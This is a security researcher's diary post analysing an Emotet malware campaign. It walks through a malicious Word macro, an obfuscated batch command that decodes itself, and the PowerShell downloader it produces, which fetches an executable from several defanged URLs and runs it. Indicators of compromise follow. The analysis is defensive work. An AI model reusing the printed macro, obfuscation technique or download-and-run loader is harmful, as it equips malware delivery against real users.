Windows Batch File Deobfuscation
Last Thursday, Brad published a diary[1] about a new ongoing campaign delivering the Emotet[2] malware. I found another sample that looked the same. My sample was called 'Order-42167322776.doc’ (SHA256:4d600ae3bbdc846727c2922485f9f7ec548a3dd031fc206dbb49bd91536a56e3[3] and looked the same as the one analyzed Brad. The infection chain was almost the same:
Spphishingsing > URL > Word > Batch File > Powershell Script > Emotet
I checked deeper the VBA macro and the batch file (launched via cmd.exe). The Word document contains indeed a macro that is split into two parts:
$ oledump.py Order-42167322776.doc 1: 114 '\x01CompObj' 2: 4096 '\x05DocumentSummaryInformation' 3: 416 '\x05SummaryInformation' 4: 13510 '1Table' 5: 42348 'Data' 6: 451 'Macros/PROJECT' 7: 89 'Macros/PROJECTwm' 8: M 55285 'Macros/VBA/YaRCzHvjhlTcHt' 9: 22067 'Macros/VBA/_VBA_PROJECT' 10: 1259 'Macros/VBA/__SRP_0' 11: 106 'Macros/VBA/__SRP_1' 12: 292 'Macros/VBA/__SRP_2' 13: 103 'Macros/VBA/__SRP_3' 14: 592 'Macros/VBA/dir' 15: M 2444 'Macros/VBA/jovqOBvRlNiVR' 16: 4096 'WordDocument'
"jovqOBvRlNiVR" contains the AutoOpen() function and is quite simple:
Sub AutoOpen()
On Error Resume Next
MJjaaH = SrzLBh
TwYpd = CInt(FjzBj / ZzUKNO * 22030 - hQFSJl)
uSrnF = 6
wMYIzu = "" + MvMVUIGZN + RzzzQipROnucPw + CVar("cm") + CUhRviLXzwY + DHNLKdV + UIzWwNJL + uTAvWVmp + \
hQqafY + tSJJEbjfzB + izvaAvGAmP + SOFJuJaEO + ianZnrivkS + vZDKCH + wDMhH + EGjJhOqrk + lUMFX + \
YYjizjCt + OqCbYKOQaS + RYChw + aNDaSPHasQv + GqfXVKsnm + iWCddKj + SDVHwnicz + lflGdnRMqRY + \
wCVNHkNZT + YuNliTfZY + HtbXa + bHmVdV + iOOQT + VGQrzww + CKnZks + DdBvD + RqTQibQWN + \
JdUbOITBWT + iWYrkMLij + zajJrhOX + FEIGUiLKbR + lJHtrLSnmF + SnqSzzuQoU + KjGShTf + ltBbWwG + \
hlnMJDiBPLq + mdCuwmM + ZIchFfzzm + BhNIuiTAZHiYuw
XtHEU = 311
rGjsB = CBool(5)
Shell@ wMYIzu, 0
aoLiA = Cos(4874)
End Sub
The module "YaRCzHvjhlTcHt" contains more functions and the real obfuscated code. The code is easy to understand: multiple functions are called and each of them returns a piece of obfuscated code that is concatenated to generate (and launch) an interesting batch file. Here is a dump of the generated code (beautified):
cmd /c CMd /v: /c "sEt '{@]=\_\_---/-\_\/_/ //\_-_-\\\--/__ -/_/_\-\--\//_\ \//_-\-_\/_-/-\ -\_\-/-_//\_-_/
\/_///_\_---_-\ /\_-_-_/--\_/\\ \-\\//__/-/-_\- \/\/_\/_-\/-__- -_-\/\\_-_///\- //-__--\_-\//_\ --_\_///-\\-\
/_ _/-\\-\/\-_/-__ --_//__--_/\\\\ -\/_\-/_\/-\/-_ _/-/\\\/-__/\-- --\/-//\/\_\-__ --/\___/\//\_\-}\\/-__/-_/
/_\\-}\\//_\\_--_/--_{_-//__-\/\--/\\h_/\/_/\-/\-_--_c_\_/\/-\--/\/-_t//_\--\_//\--\_a\-_\\__--/-///\c/-\_/-_
\_\/_-/-}/\_/\\___-/--\-;_-/_--//\\-/\\_k\_/-_\//_-_-\\/a-\/\/_-/-\-\_/_e-_\_-\-/_/\//-\r-//_\_\_\-_-//\b--\_
//\-_//\__-;//\/\-_-\\/_-_-h-_-\/_-\\/_//_\c-/\-_\///\\_-__t-\-_/-/\/-_\_/_$_\/-_\-\-\/-/__ //_\---\_/-\/__s-
/\/_/-\_-\-__\s/-//\_/\-\_-__-e--\\_--//__//\_c-\-\\///__\--/_o\_\/-\-/\-/_-__r_\---_\\///-\_/P\__-//-_\\//_-
--/_\/--\-__/\_-/t\//___/-/\\\-_-r\\-\-/\-_/-/_/_a/\-/\\\/-/-____t-/\__\_/-\/--\/S-__/-\\__--\/\/;\_\-\//--__
\_/-)-\-_//_\--//\__h/\-_/--_\\\__/-c\-\_-_//-/_\-_/t_//-_/_\-\-\-/\$--/__-/\_/_-/\\ -\/__//-\_-/\\_,\\/-_\_/
--_\_-/z\/-\/_//_-_\-_\U/__-\_\/-/-\-\_C--_--\__////\\\$/-\__--/\_\\/_/(-/-_/_/__\-/\\-e/\\\_/\-_-//__-l_//\\
/_--_/\--_i_\//-/\_\---_/_F\\__/_\-\--_///d-_\\\-/__//-_\-a_-/-\\/-__\-//\o\-/\__-\_-///-\l/\//_--\_\__\--n_-
_\\-\/_\/-/_-w_\\/-\_//_---_/o-//__\/\-\\-_-_D//\/--_--__\/\_.//\/\/-\__--_-\s//-_\_/\_\\_/--i/\/_-_-/\\/__\-
o_-/_/-/\\__\\--$\\-/-_\-/_/_-\/{_-\/\-\//_-\/__y-\_/_/_-/-\-\/_r\//-/_-\_-\\-__t-//_-\/-\-\_\__{-_/\-_\\\-//
__-)_-/\_\/\-//-_\_Y\-//-\-_\/-__\_U/-_/\-/-\__\_-/w/\-__\_-\/\-/-/$\/\_\-///\--___ /\-/-_-__/_\-\\n/__-\-/\\
/\/_-_i//_\-_\_\--\/_/ -___//_/\--\/\-z-_//\-_-//-\\\_U/\--_/-_\\-_/\_C/\_\-\-_/-_/\_/$/--\\__\//_-/\-(_-_//\
\\\_-/-_/h_///\\\-_--/_\_c\-_/_-/\_\-_/\-a/\-\--\//-__/__e-\///-\/_\-\-__r_/--//\\\\/___-o-//-\_/\-_/-_\\f/_/
-\_-//-\__\\;_\_--/\\_/--//_'/-_-\-//\__\/\-e/\-\-_//\\-_/__x/_-__\\\_--\-//e--_-/\-/\_\//__./____\/\\/-\/--'
//-\_\_---/_/_\+-\/--\\\/__-//_q-\\__/-\/_\-_/-L/-/\-_/-_/\\-_\V_-\\_\--///-_\_$/\-__//-\/\\__-+-/-_-_//\-_\\
\/'\\-_-_///\--/__\\_\\__-_//-/-/-'-_-/_-\/\-/\\__+\_/\\//_----_\/p\/\-\/__/-/__-\m_\/-_-/\__-/-\/e/\/_/\-__\
\-/-_t/-\__\-/\-/_\_/://\-\-/_\\_--_/v/--\__/_/_-\\/\n//--\__\__\--\/e-_/-/_/\\/\_-_-$\_-\\_\-///--/_=//\\-\/
_-__/-_-h_/-\/-//_\\_-\_c-/_-/\/\__\-/\-t\\-__//_/\_-\/-$\-_//-\_-/__/\-;-/\-_//\-/\_\-_'/-/--\_\-/_\/__6\-_/
//\/\-_-_-_8\-_-/-_\/\_/-\_9_/-\-__\/-/_\-/'/-_/\-_\_//-\-_ __\\\-/_--//-\/=\__\-\--\/_//-/ -_/\-/\_/-/-\\_q\
-__\_-//\/\-/-L\\--/_//_\-/\_-V-//___/\--\-\\_$\-//_/_\--/\\__;\/_/\-/_\/--\-_)\_-/__-_/-\-//\'-_/\/--_/_-\\/
\@-\-/-_/_/\-_\_/'\_\-\__-/_--///(\-\\/--\/_/-/__t\-\/-/-\//_\__-i__-/-\\\//\_-_/l-//\-/_-\\\/___p_-\/\\-/_/_
-_\-S/-\\\__/--__\/-.\\-\/__\_/_/--/'\-_/-/-//-\\\__m-_\\-\/_/_\-/_/a_//\\\__--/-\_-/_\_-_\/-\/\//_-k\/_/-__/
\\-\-_/u\\/_//\_-/\_---.//\\-\-/_\__/--o\_/-\_/\_-//_-\c\-/_\-_//-\/_-\.\/_\///_\--\-_-e/\-___\-//\\/_-g/--_\
-_-\/\\__/a--\\_\-/__/\_//u-_\/_\\//-_-/\_g-_\/_/_-/-_/\\-n_//--_\\/\/_--\a\_//-\--\___//-l-_\//-_/_/\_-\-t-_
-_/\\_//-/\\-i\__\\/---_\-//_/-/\-_/--\/__\_\//_/\\---\/___-/:-\\-/_-/_-__/\\p__---/-_\//\\\_t-\_//\/_-_-\\/-
t_/\\-__\--_/-/\h\-//\-_\/_/-__\@//--_/\/\\\-_-_X\_/-\_\\-//_-_-v-\/_\-\\//--/__7_--\-\_/_\_//-\Q/-/_-\\--_//
\_\d\/_\/-_--/_/\-_c-_//_/\-\\-/\-_/_/--//-\-\/\__\n/\_-/\_\/-\__-/v\--/--\//_\_\/_.-/_\_-\\__--\//m/\-\/_-_/
--\/_\o--//\\_/__-\-\_c-///\\__--/__\-._\_-//_/---\_\\o_-\-_-/_/-_/\\\c-___-/_/\--\/\/h_-\-\_--/\\_///c\\--\-
__//-_/_\e/_\_\_\----_///t_\/\/\--_--_/\_a___/--\/\_-\\///-_/\\/--/\/-\__//\_--/-\_\/_-/_:-/___/\/_-\\-/-p_/-
-\-_\\/-__/\t\/\/_\_/-_--_\-t_\-/\/\-/_/-_-_h//_\__/--\/\-_-@\-/--\-\_/_/_/\K/-/\-/_-/\_\_-_4\-/_\_/_-\\//-_b
\/\_/_--/-/_\_-R\-//_/-_\\__-/-0\-_\/_/_/---\_\S/_/-\\//___\-\-G/-\\--/\/\_/__-/\___/--/\\/\--_w_/\/--\_-\_-\
_/t__\--_\--/_//\\._/_-\\_-\-\_/-/m\--/\_//\_/\-_-o\/\\\_-//___---c/_/__/-\/\-_-\\._//__--\/-\/_-\t-__\/\--\/
/-/_\i\_-__/\-/\-/\-/p-///_\_-_\-/_\-u//-__/-_--\/\\_/-/-__\\//\-\_-_/_/_//\-\_-_/\--:-__/_\\/\-_-/\/p_\\/--_
-//__\-\t//-\\_\_/-\--_/t\\\/__///---\_-h_\/_/--\/\-__/\@-_\/\__\_\-/-//X\-/\-_-\\/-//__1--_\\/\\/_/_/-_K-_-/
_\_/--/\\_\/\/--\__-\_\/-_/g//\/__\__-/-\-\r//\-_\-___/\-/\o-\--/__-/\\_\/_.///_\-_\_-/-\_\e\\/_--_\-///-_\t-
_--_\/\-\__\//u/_/--/_\-\_/_\\a--_\\_\/_\-//-/b\_//_-/\/\_-_--/__\-\/\-\_//--_/-__--/_\\\//_/\:/_\\/_--/--__/
\p\_-\/-/__\//\-_t__-_-_/-/-\\\//t/_--\-_/_\/_\\-h-_\\_///-_-\_/-@-_\_-//_--/_\\/p__\\-/\-/-\-//_e/\_\_-/-_\-
\//_e\\-_/_-/-_\_-/\B/---_\///\_-\__P/\\_-/__\/-_/\-/\-\/\--_//-_\_/m\\\_-/_--/__-\/o//_\/_\-__-\/\-c/_//_--\
/\_-\_\._/--/_/\_-/_\-\s-__\/_-\/-_\-\/r__-//\\_--\//_\o/\__/\\-//_-_-\t//-_-_\-__\\/-/c/\_-/\/_--/_\\_a\\/_\
-/___-\--/g-_/_-\_-\//_/-\n\/_-\/-/\_-__\/u\\/_/_\---_\_//o/\//-_-\/_\-\__y_/-\_-/\\-_/_\/c/-_/\--_\\/\_-/o_\
-\/_/-_-\-_//./_\--___/\-\/-\w_\-//\/_\_-_-\-w_\-_-/\-/\\-/__w--/_/\/\-_/_\-_/\_\//__--/_/-\-/_//_-/--\\/\_\_
:-//--\_\_/\-_\_p_\\\\_/-_-//-_-t_/_/-/_\\\--\/-t__-/\\_--_\/-/\h/_-//\/_\---_\\'_//_/--_\\-\_-\=_/--\--_\_\/
_//Y-//_\/\_-_\_--\U-_/_\-\-_\///-_w_\/---//_/-_\\\$\\//-\_\/-_/_-_;--///_\\/__\-\-t-/\/-__-\/-_\\/n/\-_/_\__
\//---e\_\--_/__\/\--/i///--__\_\\_\-/l\--_-_\/_-\/_//C//___\/\_----/\b_/\/_\\--\__-//e--\_/_\/-/\_-/_W/--_-/
\\__/\\-_.-_\\-/\_/_-/\/_t_-/_/\_-\/\-_\/e/-\/-_/_\_\\/--N/_\-_\-__\//\-/ -\/\-_-_\__/\-/t\_\-\/-_///_\-_c-/_
--\_\//_\-_\e\\/---\/-__\/__j/_\/_\\_-/_--/\b_-/_/-_\-/\_\-/o-__\-/-\/__/-\/-_/-/--_/_/\\\\-w_-//---_/__\\/\e
__\_\-/-\/-\/_/n\\/-\__\_/_/-/-=//-\_\/\/__--_\s\//-/\-/-__\-__i-_\_-/_/\_\-//\o\/_\-\_-//_\--/$\///\\/_--\__
-_ /\\\/\-_/-___--l/_/_\-_-_\\-//-l\_-\-\/\-_//_/_e_-\_\--\/_//\/_h_--_\\/\//\__/-s/--_\\-/\//-\__r/_\-\/_/--
-\_/_e\\_-\-\/-_///-_w_\__/\\/--\-/-/o\//_\-\\_//--_-p &&
fOR /L %h IN (5583, -16, 15) dO sET }{~'=!}{~'!!'{@]:~ %h, 1!&&IF %h lss 16 CALL %}{~':*}{~'!=%“
At first sight, it looks more like some ASCII art but it contains indeed some interesting code. I started to deobfuscate it manually and removed the following characters: ‘-‘, ‘_’, ‘/‘, ‘\’. The result string was the following:
}}{hctac};kaerb;hct$ ssecorPtratS;)hct$ ,zUC$(eliFdaolnwoD.sio${yrt{)YUw$ ni zUC$(hcaerof;'exe.'+qLV$+''+pmet:
vne$=hct$;'689' = qLV$;)'@'(tilpS.'maku.oc.egaugnalti:ptth@Xv7Qdcnv.moc.ochceta:ptth@K4bR0SGwt.moc.tipu:ptth@X1
Kgro.etuab:ptth@peeBPmoc.srotcagnuoyco.www:ptth'=YUw$;tneilCbeW.teN tcejbowen=sio$ llehsrewop
Read it from right to left: ‘powershell …'
The interesting code is the following (beautified):
for /L %h in (5583, -16, 15) do
set }{~'=!}{~'!!'{@]:~ %h, 1!
if %h lss 16 call %}{~':*}{~'!=%
Variable names are also obfuscated:
- "{@]" contains the obfuscated string
- "}{~':*}{~’!" contains the result string
The result string is built by reading one character every 16 positions starting from the end (position 5583). This gives us: ‘p’, ‘o’, ‘w’, …
Once we reach the beginning of the string, %h is lower than 16, the string is executed. Here is the deobfuscated code:
powershell $ois=new-object Net.WebClient;$wUY='hxxp://www.ocyoungactors[.]com/PBeep@hxxp://baute[.]org/K1X@ \
hxxp://upit[.]com.tw/GS0Rb4K@hxxp://atechco[.]com.vn/cdQ7vX@hxxp://itlanguage.co[.]uk/am'.Split('@');
$VLq = '986’;
$tch=$env:temp+'\'+$VLq+'.exe’;
foreach($CUz in $wUY) {
try {
$ois.DownloadFile($CUz, $tch);
Start-Process $tch;
break;
}
catch{}
}
The Powershell code tries to download the second stage (Emotet) from multiple URLs, dump it to disk and executes it.
Conclusion: Windows batch files can also be used to deliver obfuscated malicious content and can be very complex. The Windows cmd command line tools have plenty of options[4] and have nothing to envy of the UNIX shells like Bash.
Here are the interesting IOC’s:
- hxxp://cartan[.]eu/files/EN_en/Invoice/Order-42167322776 (Word document dropper)
- hxxp://www.ocyoungactors[.]com/PBeep
- hxxp://baute[.]org/K1X
- hxxp://upit.com[.]tw/GS0Rb4K
- hxxp://atechco.com[.]vn/cdQ7vX
- hxxp://itlanguage.co[.]uk/am
- 986.exe (SHA256:d61687a80d697d4f2fe5d4267a1c8c2b9a763328e462c99b490f4da9dcfa6b7b)
- edgeref.exe (SHA256:77d098759f3b498b548d482c7214b6b5677e27520abcf50d2445fc8ade05aad4)
- Order-42167322776.doc (SHA256:4d600ae3bbdc846727c2922485f9f7ec548a3dd031fc206dbb49bd91536a56e3)
[1] https://isc.sans.edu/forums/diary/Recent+Emotet+activity/23908/
[2] https://www.us-cert.gov/ncas/alerts/TA18-201A
[3] https://www.virustotal.com/#/file/4d600ae3bbdc846727c2922485f9f7ec548a3dd031fc206dbb49bd91536a56e3/detection
[4] https://ss64.com/nt/
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments